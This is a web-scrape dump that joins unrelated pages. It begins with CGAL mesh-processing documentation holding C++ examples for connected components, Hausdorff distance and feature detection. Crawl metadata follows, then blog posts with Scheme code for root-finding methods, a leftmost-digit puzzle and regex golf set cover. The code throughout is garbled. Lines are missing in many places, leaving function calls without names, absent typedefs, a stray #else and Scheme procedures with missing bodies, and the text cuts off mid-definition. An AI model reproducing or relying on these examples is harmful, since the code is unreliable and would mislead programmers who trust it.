example for the optional parameter EdgeConstraintMap, a property map that returns information about an edge being a constraint or not. A constraint provides a mean to demarcate the border of a connected component, and prevents the propagation of a connected component index to cross it.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/connected_components.h>\n#include <boost/function_output_iterator.hpp>\n#include <boost/property_map/property_map.hpp>\n#include <boost/foreach.hpp>\n#include <iostream>\n#include <fstream>\n#include <map>\ntypedef Kernel::Point_3 Point;\ntypedef Kernel::Compare_dihedral_angle_3 Compare_dihedral_angle_3;\ntemplate <typename G>\nstruct Constraint : public boost::put_get_helper<bool,Constraint<G> >\n{\ntypedef typename boost::graph_traits<G>::edge_descriptor edge_descriptor;\ntypedef bool value_type;\ntypedef bool reference;\ntypedef edge_descriptor key_type;\nConstraint()\n:g_(NULL)\n{}\nConstraint(G& g, double bound)\n: g_(&g), bound_(bound)\n{}\nbool operator[](edge_descriptor e) const\n{\nconst G& g = *g_;\nreturn compare_(g.point(source(e, g)),\ng.point(target(e, g)),\ng.point(target(next(halfedge(e, g), g), g)),\ng.point(target(next(opposite(halfedge(e, g), g), g), g)),\nbound_) == CGAL::SMALLER;\n}\nconst G* g_;\nCompare_dihedral_angle_3 compare_;\ndouble bound_;\n};\ntemplate <typename PM>\nstruct Put_true\n{\nPut_true(const PM pm)\n:pm(pm)\n{}\ntemplate <typename T>\nvoid operator()(const T& t)\n{\nput(pm, t, true);\n}\nPM pm;\n};\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/blobby_3cc.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\nconst double bound = std::cos(0.75 * CGAL_PI);\nstd::vector<face_descriptor> cc;\nface_descriptor fd = *faces(mesh).first;\nmesh,\nstd::back_inserter(cc));\nstd::cerr << \"Connected components without edge constraints\" << std::endl;\nstd::cerr << cc.size() << \" faces in the CC of \" << fd << std::endl;\n// Instead of writing the faces into a container, you can set a face property to true\ntypedef Mesh::Property_map<face_descriptor, bool> F_select_map;\nF_select_map fselect_map =\nmesh,\nboost::make_function_output_iterator(Put_true<F_select_map>(fselect_map)));\nstd::cerr << \"\\nConnected components with edge constraints (dihedral angle < 3/4 pi)\" << std::endl;\nMesh::Property_map<face_descriptor, std::size_t> fccmap =\nstd::size_t num = PMP::connected_components(mesh,\nfccmap,\nPMP::parameters::edge_is_constrained_map(Constraint<Mesh>(mesh, bound)));\nstd::cerr << \"- The graph has \" << num << \" connected components (face connectivity)\" << std::endl;\ntypedef std::map<std::size_t/*index of CC*/, unsigned int/*nb*/> Components_size;\nComponents_size nb_per_cc;\nBOOST_FOREACH(face_descriptor f , faces(mesh)){\nnb_per_cc[ fccmap[f] ]++;\n}\nBOOST_FOREACH(const Components_size::value_type& cc, nb_per_cc){\nstd::cout << \"\\t CC #\" << cc.first\n<< \" is made of \" << cc.second << \" faces\" << std::endl;\n}\nstd::cerr << \"- We keep only components which have at least 4 faces\" << std::endl;\n4,\nPMP::parameters::edge_is_constrained_map(Constraint<Mesh>(mesh, bound)));\nstd::cerr << \"- We keep the two largest components\" << std::endl;\n2,\nPMP::parameters::edge_is_constrained_map(Constraint<Mesh>(mesh, bound)));\nreturn 0;\n}\n\nThe second example shows how to use the class template Face_filtered_graph which enables to treat one or several connected components as a face graph.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/connected_components.h>\n#include <CGAL/boost/graph/Face_filtered_graph.h>\n#include <boost/property_map/property_map.hpp>\n#include <boost/foreach.hpp>\n#include <iostream>\n#include <fstream>\n#include <map>\ntypedef Kernel::Point_3 Point;\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\ntypedef boost::graph_traits<Mesh>::faces_size_type faces_size_type;\ntypedef Mesh::Property_map<face_descriptor, faces_size_type> FCCmap;\ntypedef CGAL::Face_filtered_graph<Mesh> Filtered_graph;\nint main(int argc, char* argv[])\n{\nstd::ifstream input((argc > 1) ? argv : \"data/blobby_3cc.off\");\nMesh mesh;\nif (!input || !(input >> mesh) || mesh.is_empty()) {\nstd::cerr << \"Not a valid off file.\" << std::endl;\nreturn 1;\n}\nfaces_size_type num = PMP::connected_components(mesh,fccmap);\nstd::cerr << \"- The graph has \" << num << \" connected components (face connectivity)\" << std::endl;\nFiltered_graph ffg(mesh, 0, fccmap);\nstd::cout << \"The faces in component 0 are:\" << std::endl;\nBOOST_FOREACH(boost::graph_traits<Filtered_graph>::face_descriptor f, faces(ffg)){\nstd::cout << f << std::endl;\n}\nif(num>1){\nstd::vector<faces_size_type> components;\ncomponents.push_back(0);\ncomponents.push_back(1);\nffg.set_selected_faces(components, fccmap);\nstd::cout << \"The faces in components 0 and 1 are:\" << std::endl;\nBOOST_FOREACH(Filtered_graph::face_descriptor f, faces(ffg)){\nstd::cout << f << std::endl;\n}\n}\nreturn 0;\n}\n\n# Approximate Hausdorff Distance\n\nThis package provides methods to compute (approximate) distances between meshes and point sets.\n\nThe function approximate_Hausdorff_distance() computes an approximation of the Hausdorff distance from a mesh tm1 to a mesh tm2. Given a a sampling of tm1, it computes the distance to tm2 of the farthest sample point to tm2 . The symmetric version (approximate_symmetric_Hausdorff_distance()) is the maximum of the two non-symmetric distances. Internally, points are sampled using sample_triangle_mesh() and the distance to each sample point is computed using max_distance_to_triangle_mesh(). The quality of the approximation depends on the quality of the sampling and the runtime depends on the number of sample points. Three sampling methods with different parameters are provided (see Figure 60.10).", null, "Figure 60.10 Sampling of a triangle mesh using different sampling methods. From left to right: (a) Grid sampling, (b) Monte-Carlo sampling with fixed number of points per face and per edge, (c) Monte-Carlo sampling with a number of points proportional to the area/length, and (d) Uniform random sampling. The four pictures represent the sampling on the same portion of a mesh, parameters were adjusted so that the total number of points sampled in faces (blue points) and on edges (red points) are roughly the same. Note that when using the random uniform sampling some faces/edges may not contain any point, but this method is the only one that allows to exactly match a given number of points.\n\nThe function approximate_max_distance_to_point_set() computes an approximation of the Hausdorff distance from a mesh to a point set. For each triangle, a lower and upper bound of the Hausdorff distance to the point set are computed. Triangles are refined until the difference between the bounds is lower than a user-defined precision threshold.\n\n## Approximate Hausdorff Distance Example\n\nIn the following example, a mesh is isotropically remeshed and the approximate distance between the input and the output is computed.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/distance.h>\n#include <CGAL/Polygon_mesh_processing/remesh.h>\n#define TAG CGAL::Parallel_tag\n#else\n#define TAG CGAL::Sequential_tag\n#endif\ntypedef K::Point_3 Point;\nint main()\n{\nMesh tm1, tm2;\nCGAL::make_tetrahedron(Point(.0,.0,.0),\nPoint(2,.0,.0),\nPoint(1,1,1),\nPoint(1,.0,2),\ntm1);\ntm2=tm1;\nstd::cout << \"Approximated Hausdorff distance: \"\n<TAG>(tm1, tm2, PMP::parameters::number_of_points_per_area_unit(4000))\n<< std::endl;\n}\n\n## Max Distance Between Point Set and Surface Example\n\nIn Poisson_surface_reconstruction_3/poisson_reconstruction_example.cpp, a triangulated surface mesh is constructed from a point set using the Poisson reconstruction algorithm , and the distance between the point set and the reconstructed surface is computed with the following code:\n\n// computes the approximation error of the reconstruction\ndouble max_dist =\npoints,\n4000);\nstd::cout << \"Max distance to point_set: \" << max_dist << std::endl;\n\n# Feature Detection\n\nThis package provides methods to detect some features of a polygon mesh.\n\nThe function CGAL::Polygon_mesh_processing::sharp_edges_segmentation() detects the sharp edges of a polygon mesh and deduces surface patches and vertices incidences. It can be split into three functions : CGAL::Polygon_mesh_processing::detect_sharp_edges(), CGAL::Polygon_mesh_processing::connected_components() and CGAL::Polygon_mesh_processing::detect_vertex_incident_patches(), that respectively detect the sharp edges, compute the patch indices, and give each of pmesh vertices the patch indices of its incident faces.\n\n## Feature Detection Example\n\nIn the following example, we count how many edges of pmesh are incident to two faces which normals form an angle smaller than 90 degrees, and the number of surface patches that are separated by these edges.\n\n#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>\n#include <CGAL/Surface_mesh.h>\n#include <CGAL/Polygon_mesh_processing/detect_features.h>\n#include <fstream>\ntypedef boost::graph_traits<Mesh>::face_descriptor face_descriptor;\nint main(int argc, char* argv[])\n{\nconst char* filename = (argc > 1) ? argv : \"data/P.off\";\nstd::ifstream input(filename);\nMesh mesh;\nif (!input || !(input >> mesh))\n{\nstd::cerr << \"Not a valid input file.\" << std::endl;\nreturn 1;\n}\ntypedef boost::property_map<Mesh, CGAL::edge_is_feature_t>::type EIFMap;\ntypedef boost::property_map<Mesh, CGAL::face_patch_id_t<int> >::type PIMap;\ntypedef boost::property_map<Mesh, CGAL::vertex_incident_patches_t<int> >::type VIMap;\nEIFMap eif = get(CGAL::edge_is_feature, mesh);\nPIMap pid = get(CGAL::face_patch_id_t<int>(), mesh);\nVIMap vip = get(CGAL::vertex_incident_patches_t<int>(), mesh);\nstd::size_t number_of_patches\n= PMP::sharp_edges_segmentation(mesh, 90, eif, pid,\nPMP::parameters::vertex_incident_patches_map(vip));\nstd::size_t nb_sharp_edges = 0;\nBOOST_FOREACH(boost::graph_traits<Mesh>::edge_descriptor e, edges(mesh))\n{\nif(get(eif, e))\n++nb_sharp_edges;\n}\nstd::cout<<\"This mesh contains \"<<nb_sharp_edges<<\" sharp edges\"<<std::endl;\nstd::cout<<\" and \"<<number_of_patches<<\" surface patches.\"<<std::endl;\nreturn 0;\n}\n\n# Implementation History\n\nA first version of this package was started by Ilker O. Yaz and Sébastien Loriot. Jane Tournois worked on the finalization of the API, code, and documentation." ]
[ null, "https://doc.cgal.org/4.12/Manual/search/mag_sel.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/neptun_head.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/iso_remeshing.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/corefine.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/bounded_vols.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/bool_op.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/mech_hole_horz.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/fork.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/elephants-with-holes.png", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/selfintersections.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/slicer.jpg", null, "https://doc.cgal.org/4.12/Polygon_mesh_processing/pmp_sampling_bunny.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69382524,"math_prob":0.8532378,"size":57052,"snap":"2022-05-2022-21","text_gpt3_token_len":13686,"char_repetition_ratio":0.17252138,"word_repetition_ratio":0.15798439,"special_character_ratio":0.2482472,"punctuation_ratio":0.23769924,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9911741,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-18T15:26:25Z\",\"WARC-Record-ID\":\"<urn:uuid:019f8d10-3eb0-4f2d-a594-300724f50354>\",\"Content-Length\":\"175284\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8d00c692-d162-4528-a6ab-58a27d2061e2>\",\"WARC-Concurrent-To\":\"<urn:uuid:076618c2-a6b4-4236-8186-6ed3191952d6>\",\"WARC-IP-Address\":\"213.186.33.40\",\"WARC-Target-URI\":\"https://doc.cgal.org/4.12/Polygon_mesh_processing/index.html\",\"WARC-Payload-Digest\":\"sha1:KSMTGRN6ES2OGXN7VLKNJDYYNK2OQAIR\",\"WARC-Block-Digest\":\"sha1:DFVQY34VPCBJC2ALRCQNFS4HJ5332TSK\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662522284.20_warc_CC-MAIN-20220518151003-20220518181003-00518.warc.gz\"}"}
https://funcall.blogspot.com/2014/08/
[ "## Wednesday, August 27, 2014\n\n### A use of Newton's method\n\nI've seen more than one book claim that computing with real numbers inevitably involves round-off errors because real numbers can have an infinite number of digits after the decimal point and no finite representation can hold them. This is false. Instead of representing a real number as a nearby rational number with an error introduced by rounding, we'll represent a real number as computer program that generates the digits. The number of digits generated is potentially infinite, but the program that generates them is definitely finite.\n\nHere is Gosper's algorithm for computing the square root of a rational number.\n```(define (gosper-sqrt a b c d)\n;; Solve for\n;; ax + b\n;; ------ = x\n;; cx + d\n(define (newtons-method f f-prime guess)\n(let ((dy (f guess)))\n(if (< (abs dy) 1)\nguess\n(let ((dy/dx (f-prime guess)))\n(newtons-method f f-prime (- guess (/ dy dy/dx)))))))\n\n(define (f x)\n(+ (* c x x)\n(* (- d a) x)\n(- b)))\n\n(define (f-prime x)\n(+ (* 2 c x)\n(- d a)))\n\n(let ((value (floor (newtons-method f f-prime b))))\n(cons-stream value\n(gosper-sqrt (+ (* c value) d)\nc\n(+ (* (- a (* value c)) value)\n(- b (* value d)))\n(- a (* value c))))))\n\n1 ]=> (cf:render (gosper-sqrt 0 17 10 0))\n1.303840481040529742916594311485836883305618755782013091790079369...\n\n;; base 10, 100 digits\n1 ]=> (cf:render (gosper-sqrt 0 17 10 0) 10 100)\n1.303840481040529742916594311485836883305618755782013091790079369896765385576397896545183528886788497...\n```\n\n## Tuesday, August 26, 2014\n\n### Solutions in search of problems\n\nSuppose you have a function like `(define foo (lambda (x) (- (* x x x) 30)))` and you want to find `x` such that `(foo x)` = `0`. There are a few ways to go about this. If you can find two different `x` such that `(foo x)` is positive for one and negative for the other, then `(foo x)` must be zero somewhere in between. A simple binary search will find it.\n```(define (bisection-method f left right)\n(let* ((midpoint (average left right))\n(fmid (f midpoint)))\n(if (< (abs fmid) 1e-8)\nmidpoint\n(let ((fl (f left))\n(fr (f right)))\n(cond ((same-sign? fl fr) (error \"Left and right not on opposite sides.\"))\n((same-sign? fmid fr) (bisection-method f left midpoint))\n((same-sign? fl fmid) (bisection-method f midpoint right))\n(else (error \"shouldn't happen\")))))))\n\n(define (average l r) (/ (+ l r) 2))\n\n(define (same-sign? l r)\n(or (and (positive? l)\n(positive? r))\n(and (negative? l)\n(negative? r))))\n\n1 ]=> (cos 2)\n\n;Value: -.4161468365471424\n\n1 ]=> (cos 1)\n\n;Value: .5403023058681398\n\n1 ]=> (bisection-method cos 1.0 2.0)\n1. 2.\n1.5 2.\n1.5 1.75\n1.5 1.625\n1.5625 1.625\n1.5625 1.59375\n1.5625 1.578125\n1.5703125 1.578125\n1.5703125 1.57421875\n1.5703125 1.572265625\n1.5703125 1.5712890625\n1.5703125 1.57080078125\n1.570556640625 1.57080078125\n1.5706787109375 1.57080078125\n1.57073974609375 1.57080078125\n1.570770263671875 1.57080078125\n1.5707855224609375 1.57080078125\n1.5707931518554687 1.57080078125\n1.5707931518554687 1.5707969665527344\n1.5707950592041016 1.5707969665527344\n1.570796012878418 1.5707969665527344\n1.570796012878418 1.5707964897155762\n1.570796251296997 1.5707964897155762\n1.570796251296997 1.5707963705062866\n1.5707963109016418 1.5707963705062866\n1.5707963109016418 1.5707963407039642\n;Value: 1.570796325802803```\nRather than selecting the midpoint between the two prior guesses, you can pretend that your function is linear between the guesses and interpolate where the zero should be. This can converge quicker.\n```(define (secant-method f x1 x2)\n(display x1) (display \" \") (display x2) (newline)\n(let ((f1 (f x1))\n(f2 (f x2)))\n(if (< (abs f1) 1e-8)\nx1\n(let ((x0 (/ (- (* x2 f1) (* x1 f2))\n(- f1 f2))))\n(secant-method f x0 x1)))))\n\n1 ]=> (secant-method cos 0.0 4.0)\n0. 4.\n2.418900874126076 0.\n1.38220688493168 2.418900874126076\n1.5895160570280047 1.38220688493168\n1.5706960159120333 1.5895160570280047\n1.5707963326223677 1.5706960159120333\n;Value: 1.5707963326223677\n```\nIf you know the derivative of `f`, then you can use Newton's method to find the solution.\n```(define (newtons-method f f-prime guess)\n(display guess) (display \" \") (newline)\n(let ((dy (f guess)))\n(if (< (abs dy) 1e-8)\nguess\n(let ((dy/dx (f-prime guess)))\n(newtons-method f f-prime (- guess (/ dy dy/dx)))))))\n\n1 ]=> (newtons-method cos (lambda (x) (- (sin x))) 2.0)\n2.\n1.5423424456397141\n1.5708040082580965\n1.5707963267948966\n;Value: 1.5707963267948966```\nHere's another example. We'll find the cube root of 30 by solving `(lambda (x) (- (* x x x) 30))`.\n```(define (cube-minus-thirty x) (- (* x x x) 30))\n\n1 ]=> (bisection-method cube-minus-thirty 0.0 4.0)\n0. 4.\n2. 4.\n3. 4.\n3. 3.5\n3. 3.25\n3. 3.125\n3.0625 3.125\n3.09375 3.125\n3.09375 3.109375\n3.1015625 3.109375\n3.10546875 3.109375\n3.10546875 3.107421875\n3.1064453125 3.107421875\n3.10693359375 3.107421875\n3.107177734375 3.107421875\n3.107177734375 3.1072998046875\n3.107177734375 3.10723876953125\n3.107208251953125 3.10723876953125\n3.1072235107421875 3.10723876953125\n3.1072311401367187 3.10723876953125\n3.1072311401367187 3.1072349548339844\n3.1072311401367187 3.1072330474853516\n3.107232093811035 3.1072330474853516\n3.107232093811035 3.1072325706481934\n3.1072323322296143 3.1072325706481934\n3.107232451438904 3.1072325706481934\n3.107232451438904 3.1072325110435486\n3.107232481241226 3.1072325110435486\n3.1072324961423874 3.1072325110435486\n3.107232503592968 3.1072325110435486\n3.107232503592968 3.1072325073182583\n3.107232505455613 3.1072325073182583\n3.107232505455613 3.1072325063869357\n;Value: 3.1072325059212744\n\n1 ]=> (secant-method cube-minus-thirty 0.0 4.0)\n0. 4.\n1.875 0.\n8.533333333333333 1.875\n2.1285182547245376 8.533333333333333\n2.341649751209406 2.1285182547245376\n3.4857887202177547 2.341649751209406\n3.0068542655016235 3.4857887202177547\n3.0957153766467633 3.0068542655016235\n3.1076136741672546 3.0957153766467633\n3.1072310897513415 3.1076136741672546\n3.1072325057801455 3.1072310897513415\n;Value: 3.1072325057801455\n\n1 ]=> (define (cube-minus-thirty-prime x) (* 3 x x))\n\n1 ]=> (newtons-method cube-minus-thirty cube-minus-thirty-prime 4.0)\n4.\n3.2916666666666665\n3.1173734622300557\n3.10726545916981\n3.1072325063033337\n3.107232505953859\n;Value: 3.107232505953859```\n\n## Friday, August 22, 2014\n\n### Small puzzle solution\n\nBefore I give my solution, I'd like to describe the leftmost digit algorithm in a bit more detail.\n```(define (leftmost-digit base n)\n(if (< n base)\nn\n(let ((leftmost-pair (leftmost-digit (* base base) n)))\n(if (< leftmost-pair base)\nleftmost-pair\n(quotient leftmost-pair base)))))```\nThe idea is this: if we have a one digit number, we just return it, otherwise we recursively call `leftmost-digit` with the square of the base. Squaring the base will mean gobbling up pairs of digits in the recursive call, so we'll get back either a one or two digit answer from the recursion. If it is one digit, we return it, otherwise it's two digits and we divide by the base to get the left one.\n\nFor example, if our number is 12345678 and the base is 10, we'll make a recursive call with base 100. The recursive call will deal with number as if it were written `12 34 56 78` in base 100 and return the answer 12. Then we'll divide that by 10 to get the 1.\n\nSince we're squaring the base, we're doubling the number of digits we're dealing with on each recursive call. This leads to the solution in O(log log n) time. If we instrument `quotient`, you can see:\n```(leftmost-digit 10 816305093398751331727331379663195459013258742431006753294691576)\n816305093398751331727331379663195459013258742431006753294691576 / 100000000000000000000000000000000\n8163050933987513317273313796631 / 10000000000000000\n816305093398751 / 100000000\n8163050 / 10000\n816 / 100```\nA sixty-three digit number trimmed down to one digit with only five divisions.\n\nSo a simple solution to the puzzle is:\n```(define (leftmost-digit+ base n)\n(if (< n base)\n(values n 0)\n(call-with-values (lambda () (leftmost-digit+ (* base base) n))\n(lambda (leftmost-pair count)\n(if (< leftmost-pair base)\n(values leftmost-pair (* count 2))\n(values (quotient leftmost-pair base) (+ (* count 2) 1)))))))\n```\nThe second value is the count of how many digits we discard. If the number is less than the base, we return it and we discarded nothing. Otherwise, we make the recursive call with the base squared and get back two values, the leftmost pair and the number of pairs it discarded. If the leftmost pair is a single digit, we return it, otherwise we divide by the base. The number of digits discarded is simply twice the number discarded by the recursive call, plus one more if we had to divide.\n\nBut I don't see an easy way to separate finding the digit from finding the position. At first it seemed straightforward to just count the digits being discarded, but you can't decide whether to increment the count at each stage without determining if the leftmost part of the recursive call contains one or two digits.\n\n## Thursday, August 21, 2014\n\n### Just a small puzzle\n\nYou can get the most significant digit (the leftmost) of a number pretty quickly this way\n```(define (leftmost-digit base n)\n(if (< n base)\nn\n(let ((leftmost-pair (leftmost-digit (* base base) n)))\n(if (< leftmost-pair base)\nleftmost-pair\n(quotient leftmost-pair base)))))```\nThe puzzle is to adapt this code to return the position of the leftmost digit.\n\n`(leftmost-digit+ 10 46729885) would return two values, 4 and 7`\n\n## Friday, August 8, 2014\n\n### Mini regex golf 3: set cover\n\nI'm computing the set cover by incrementally adding items to be covered. Naturally, the order in which you add items changes the way the program progresses. I added code that picks an item to be added each iteration rather than just pulling the `car` off the front of a list.\n```(define (cover8 value->keys-table better-solution)\n\n(let ((value (car v-k-entry))\n(keys (cdr v-k-entry)))\n\n(write-string \"Adding value \") (write value) (newline)\n(write-string \" with keys \") (write keys) (newline)\n(write-string \" to \") (write (length solution-set))\n(write-string \" partial solutions.\") (newline)\n\n(let ((new-solutions\n(map make-new-solution (cartesian-product solution-set keys))))\n\n(let ((trimmed-solutions\n(trim-partial-solutions value->keys-table new-solutions)))\n\n(write-string \"Returning \") (write (length trimmed-solutions))\n(write-string \" of \") (write (length new-solutions))\n(write-string \" new partial solutions.\") (newline)\n\ntrimmed-solutions))))\n\n(define (cover v-k-entries)\n(cond ((pair? v-k-entries)\n(pick-v-k-entry value->keys-table v-k-entries\n(lambda (selected remaining)\n((null? v-k-entries)\n(list '()))\n(else (improper-list-error 'cover v-k-entries))))\n\n(let ((minimized (minimize-vktable value->keys-table better-solution)))\n(least-elements (cover minimized) better-solution)))\n\n(define (score v-k-entry)\n(let* ((matched-all\n(count-matching-items value->keys-table\n(lambda (other)\n(there-exists? (cdr v-k-entry)\n(lambda (key) (member key (cdr other)))))))\n(matched-remaining\n(count-matching-items v-k-entries\n(lambda (other)\n(there-exists? (cdr v-k-entry)\n(lambda (key) (member key (cdr other)))))))\n(matched-forward (- matched-all matched-remaining)))\n(cons matched-remaining matched-forward)))\n\n(let ((scored (map (lambda (v-k-entry) (cons (score v-k-entry) v-k-entry))\nv-k-entries)))\n\n(let ((picked\n(cdar\n(least-elements scored\n(lambda (left right)\n(let* ((len-l (length (cdr left)))\n(len-r (length (cdr right)))\n(lmr (caar left))\n(lmf (cdar left))\n(rmr (caar right))\n(rmf (cdar right)))\n(or (> len-l len-r)\n(and (= len-l len-r)\n(or (> lmf rmf)\n(and (= lmf rmf)\n(< lmr rmr)))))\n))))))\n\n(display \"Picking \") (write picked) (newline)\n\n(define (trim-partial-solutions value->keys-table partial-solutions)\n(let ((equivalent-solutions\n(map (lambda (entry) (cons (cdr entry) (car entry)))\n(collect-equivalent-partial-solutions value->keys-table\npartial-solutions))))\n(write-string \" Deleting \")\n(write (- (length partial-solutions) (length equivalent-solutions)))\n(write-string \" equivalent partial solutions.\")\n(newline)\n\n(remove-dominated-solutions value->keys-table\n(map lowest-scoring-equivalent-partial-solution\nequivalent-solutions))))\n```\nFinally, it turns out that computing dominating partial solutions is expensive, so I changed the set operations to use a bitmap representation:\n```(define (remove-dominated-solutions value->keys-table partial-solutions)\n(let ((before-length (length partial-solutions))\n(all-values (get-values value->keys-table)))\n(let ((table\n;; put the long ones in first\n(sort\n(map (lambda (partial-solution)\n(cons partial-solution\n(lset->bset all-values\n(map car (partial-solution-matches value->keys-table\npartial-solution)))))\npartial-solutions)\n(lambda (left right)\n(> (length (bset->lset all-values (cdr left)))\n(length (bset->lset all-values (cdr right))))))))\n\n(dominates-solution? solution))\n'()\ntable))))\n(write-string \" Removing \") (write (- before-length after-length))\n(write-string \" dominated solutions.\")\n(newline)\n\n(define (dominates-solution? solution)\n(let* ((partial-solution (car solution))\n(partial-solution-score (score partial-solution))\n(solution-matches-raw (cdr solution)))\n(lambda (other-solution)\n(let* ((other-partial-solution (car other-solution))\n(other-matches-raw (cdr other-solution)))\n(and\n(bset-superset? other-matches-raw solution-matches-raw)\n(<= (score other-partial-solution) partial-solution-score))))))\n\n(define (get-values v-k-table)\n'()\nv-k-table))\n\n(define (bset-element->bit universe element)\n(cond ((null? element) 0)\n(else (expt 2 (list-index (lambda (item) (eq? item element)) universe)))))\n\n(bset-union bset (bset-element->bit universe element)))\n\n(define (lset->bset universe lset)\n0\nlset))\n\n(define (bset->lset universe bset)\n(cond ((zero? bset) '())\n((even? bset) (bset->lset (cdr universe) (/ bset 2)))\n(else (cons (car universe) (bset->lset (cdr universe) (/ (- bset 1) 2))))))\n\n(define (bset-union left right) (bitwise-ior left right))\n\n(define (bset-superset? bigger smaller)\n;; Is every element of smaller in bigger?\n(zero? (bitwise-andc2 smaller bigger)))\n```\nThis code can now find the shortest regular expression consisting of letters and dots (and ^\\$) that matches one set of strings but not another.\n\nDepending on the strings, this can take quite a bit of time to run. Dotted expressions cause a combinatorical explosion in matching regexps (or substrings), but what makes it worse is that the dotted expressions tend to span different sets of strings. If two different dotted expressions, each with different matching sets of strings, appear in a single string, then the number of partial solutions will be multiplied by two as we try each different dotted expression.\n\nIt is characteristic of NP problems that it is easy to determine if you have a good solution, but quite hard to find it among a huge number of other, poor solutions. This problem exhibits this characteristic, but there is a bit more structure in the problem that we are exploiting. The word lists are drawn from the English language. This makes some bigrams, trigrams, etc. far, far, more likely to appear than others.\n\nShort words are much easier to process than longer ones because they simply contain fewer things to match. On the other hand, longer words tend to be dominated by shorter ones anyway.\n\nTo be continued...\n\n## Thursday, August 7, 2014\n\n### Mini regex golf 2: adding regular expressions\n\nIt wasn't too hard to add regular expressions to the substring version. What took a while was just tinkering with the code, breaking it, fixing it again, noticing an optimization, tinkering, etc. etc. In any case it works and here is some of it.\n```(define (make-extended-ngram-table winners losers)\n(let* ((initial-ngrams (generate-ngrams winners losers)))\n(write-string \"Initial ngrams: \") (write (length initial-ngrams))\n(newline)\n(map (lambda (winner)\n(cons winner\n(keep-matching-items initial-ngrams\n(lambda (ngram) (re-string-search-forward ngram winner)))))\nwinners)))\n\n(define (generate-ngrams winners losers)\n(write-string \"Generating ngrams...\")(newline)\n(let ((losing-ngram? (string-list-matcher losers)))\n(lset-union equal? answer (extended-ngrams losing-ngram? winner)))\n'()\nwinners)))\n\n(define (string-list-matcher string-list)\n(lambda (test-ngram)\n(there-exists? string-list\n(lambda (string)\n(re-string-search-forward test-ngram string)))))\n\n(define *dotification-limit* 4)\n(define *generate-ends-of-words* #t)\n(define *generate-dotted* #t)\n\n(define (ngrams-of-length n string)\n(do ((start 0 (1+ start))\n(end n (1+ end))\n\n(answer '() (let ((item (car tail)))\n(if (losing-ngram? dotted)\n(dotify item)))))\n((not (pair? tail))\n(if (null? tail)\n(improper-list-error 'generate-dotted tail)))))\n\n(define (dotify word)\n(cond ((string=? word \"\") (list \"\"))\n((> (string-length word) *dotification-limit*) (list word))\n(else\n(string-append replacement dotified)))\n(replacements (substring word 0 1))))\n'()\n(dotify (substring word 1 (string-length word)))))))\n\n(define (replacements string)\n(if (or (string=? string \"^\")\n(string=? string \"\\$\"))\n(list string)\n(list string \".\")))\n\n(define (extended-ngrams losing-ngram? string)\n(let ((string (if *generate-ends-of-words*\n(string-append \"^\" string \"\\$\")\nstring)))\n(do ((n 1 (+ n 1))\n(delete-matching-items (ngrams-of-length n string)\nlosing-ngram?))))\n((> n (string-length string))\n(if *generate-dotted*\nAdding the dotification greatly increases the number of ways to match words:\n```1 ]=> (extended-ngrams (string-list-matcher losers) \"lincoln\")\n\n;Value 15: (\"li\" \"ln\" \"ln\\$\" \"oln\" \".ln\" \"col\" \"lin\" \"li.\" \"^li\" \"o.n\\$\" \"oln\\$\" \".ln\\$\" \"col.\" \"c.ln\" \"..ln\" \"coln\" \".oln\" \"co.n\" \"n.ol\" \"..ol\" \"ncol\" \".col\" \"nc.l\" \"i.co\" \"inco\" \"i..o\" \"in.o\" \"lin.\" \"li..\" \"l.nc\" \"linc\" \"l..c\" \"li.c\" \"^li.\" \"^lin\" \"coln\\$\" \"ncoln\" \"incol\" \"linco\" \"^linc\" \"ncoln\\$\" \"incoln\" \"lincol\" \"^linco\" \"incoln\\$\" \"lincoln\" \"^lincol\" \"lincoln\\$\" \"^lincoln\" \"^lincoln\\$\")```\nThe table that maps words to their extended ngrams is quite large, but it can be reduced in size without affecting the solution to the set cover problem. If two regexps match exactly the same set of winning strings, then one can be substituted for the other in any solution, so we can discard all but the shortest of these. If a regexp matches a proper superset of another regexp, and the other regexp is at least the same length or longer, then the first regexp dominates the second one, so we can discard the second one.\n```(define (minimize-keys value->keys-table better-solution)\n(let* ((all-keys (get-keys value->keys-table))\n(equivalents (collect-equivalent-partial-solutions value->keys-table\n(map list all-keys)))\n(reduced (map (lambda (equivalent)\n(cons (car equivalent)\n(car (least-elements (cdr equivalent)\nbetter-solution))))\nequivalents))\n(dominants (collect-dominant-partial-solutions reduced better-solution))\n'()\ndominants)))\n\n(define (rebuild-entry entry)\n(cons (car entry) (keep-matching-items (cdr entry)\n(lambda 